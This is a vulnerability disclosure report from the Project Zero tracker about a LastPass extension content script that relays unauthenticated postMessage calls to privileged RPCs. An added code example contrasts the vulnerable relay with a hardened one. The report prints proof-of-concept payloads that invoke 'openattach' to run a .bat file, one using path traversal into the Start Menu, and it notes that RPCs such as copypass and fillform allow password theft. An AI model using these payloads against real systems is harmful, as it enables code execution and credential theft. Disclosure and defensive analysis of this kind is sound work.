Project Zero issue tracker (project: project-zero)
Issue 1209 LastPass: websiteConnector.js content script allows proxying internal RPC commands
Reported by Project Member, Mar 20
Status: Fixed
Closed: Mar 21

I noticed this entry in the content_script array from the LastPass manifest:

			"matches": [ ... ],          (a single LastPass origin; value stripped from this copy)
			"js": [ ... ],               (value stripped from this copy)
			"all_frames": true,
			"run_at": "document_end"

That's a content script that is only used for one specific domain, if we look at the script:

$ uglifyjs --beautify < 1minsignup/chrome/websiteConnector.js
window.addEventListener("message", function(e) {
    /* guard stripped from this copy */ || chrome.runtime.sendMessage(/* extension id and message stripped from this copy */, function(e) {});
});

That doesn't look good: this script will proxy unauthenticated window messages to the extension. This is clearly a mistake, because anybody can do

win = window.open("");   // target URL stripped from this copy
win.postMessage({}, "*");

Therefore, this allows complete access to internal privileged LastPass RPC commands. There are hundreds of internal LastPass RPCs, but the obviously bad ones are things like copying and filling in passwords (copypass, fillform, etc). If you install the binary component, you can also use "openattach" to run arbitrary code.

For example, this will run calc.exe:

win = window.open("");   // target URL stripped from this copy
win.postMessage({fromExtension: false, cmd: "openattach", attachkey: "d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec", data: "!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==", mimetype: "other:.bat"}, "*");

(This code will need to be inside an onclick handler to open a popup).

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

Attachment: Windows 7-2017-03-20-16-14-27.png (104 KB)
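The report's point is that the content script forwards any window message to the extension, with no check on who posted it. The following is an added example (my code, not LastPass's websiteConnector.js and not the exploit above) that models that relay next to the checks it was missing. The browser pieces (the message listener and chrome.runtime.sendMessage) are replaced by plain function arguments so it runs under Node; TRUSTED_ORIGIN, the command names and the message shapes are assumptions for illustration, not LastPass's real values.

```javascript
// Added example, not LastPass code: a stripped-down model of the relay pattern
// in websiteConnector.js next to the checks it lacked. The browser pieces
// (window.addEventListener, chrome.runtime.sendMessage) are replaced by plain
// function arguments so this runs under Node. TRUSTED_ORIGIN and the command
// names are assumptions for illustration, not LastPass's real values.

const TRUSTED_ORIGIN = "https://vault.example.test";   // assumed
const ALLOWED_CMDS = new Set(["ping", "getversion"]);  // assumed

// Vulnerable shape: anything posted to the window is handed to the extension.
// A page that can get a handle to this window (window.open, an iframe) can
// therefore drive the extension's internal RPCs.
function vulnerableRelay(event, sendMessage) {
  if (event.data && event.data.fromExtension) return null; // the only filter
  return sendMessage(event.data);
}

// Hardened shape: the message must come from the trusted origin, from the
// page's own window (not an opener or embedder), carry a well-formed payload,
// and name an allow-listed command. The forwarded object is rebuilt so no
// extra attacker-controlled fields reach the extension.
function hardenedRelay(event, sendMessage, ownWindow) {
  if (event.origin !== TRUSTED_ORIGIN) return { rejected: "origin" };
  if (event.source !== ownWindow) return { rejected: "source" };
  const d = event.data;
  if (typeof d !== "object" || d === null || typeof d.cmd !== "string") {
    return { rejected: "shape" };
  }
  if (!ALLOWED_CMDS.has(d.cmd)) return { rejected: "cmd" };
  const args = (typeof d.args === "object" && d.args !== null) ? { ...d.args } : {};
  return sendMessage({ cmd: d.cmd, args });
}

// Stand-in for the extension's background page: records what it was sent.
function fakeExtension() {
  const received = [];
  return {
    received,
    sendMessage: (msg) => { received.push(msg); return { sent: true, cmd: msg.cmd }; },
  };
}

// Constructed MessageEvent-like objects: one posted from an attacker's window
// (what the report's win.postMessage(...) would produce) and one legitimate
// message from the page's own scripts.
const PAGE_WINDOW = { name: "page" };
const ATTACKER_WINDOW = { name: "attacker" };
const attackerEvent = {
  origin: "https://attacker.test",
  source: ATTACKER_WINDOW,
  data: { fromExtension: false, cmd: "openattach", mimetype: "other:.bat" },
};
const legitEvent = { origin: TRUSTED_ORIGIN, source: PAGE_WINDOW, data: { cmd: "ping" } };

function demo() {
  const weak = fakeExtension();
  const strong = fakeExtension();
  return {
    weakAttacker: vulnerableRelay(attackerEvent, weak.sendMessage),
    weakForwarded: weak.received.length,
    strongAttacker: hardenedRelay(attackerEvent, strong.sendMessage, PAGE_WINDOW),
    strongLegit: hardenedRelay(legitEvent, strong.sendMessage, PAGE_WINDOW),
    strongForwarded: strong.received.length,
  };
}

console.log(demo());
```

The origin and source checks stop the cross-window postMessage used in the report, but they are not the whole fix: a page bug on the trusted origin would still get through, so the extension side should not expose privileged RPCs (copypass, fillform, openattach) to any content-script relay at all, and should accept only the small allow-listed set the page genuinely needs.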
Comment 1 Deleted
Comment 2 by Project Member, Mar 21
Ah, this version is better; it works without a prompt on Windows 10:

win = window.open("");   // target URL stripped from this copy
win.postMessage({fromExtension: false, cmd: "openattach", attachkey: "d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec", data: "!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==", mimetype: "other:./../../../../../Start Menu/Programs/exploit.bat"}, "*");

This requires that the user has enabled "Binary Component" (Click LastPass->More Options->About LastPass), but you can actually force lastpass to prompt the user to install it with another RPC.

Otherwise, you will have to settle for just stealing passwords :)
Comment 3 Deleted
Comment 4 by Project Member, Mar 21
LastPass responded and said they have NXDOMAIN'd while they investigate.

They also said they couldn't get my exploit to work, but I checked my apache access logs and they were using a Mac. Naturally, calc.exe will not appear on a Mac.

Nevertheless, disabling seems like a good enough mitigation for now.
Comment 5 by Project Member, Mar 21
Labels: -Restrict-View-Commit
Status: Fixed
I've uploaded the exploit here:

It looks like LastPass now consider this issue resolved:

Hopefully they have taken down the service and not just removed the DNS entry, or a mitm can still insert correct DNS responses. 

Additionally, if any corporate intercepting SSL proxy is returning custom error pages for NXDOMAIN, then this might still be exploitable; you should test the exploit if you think this might apply to you and contact your administrator if necessary.

Marking fixed.

(Please note, issue 1188 which affects LastPass on firefox is not fixed, and still works)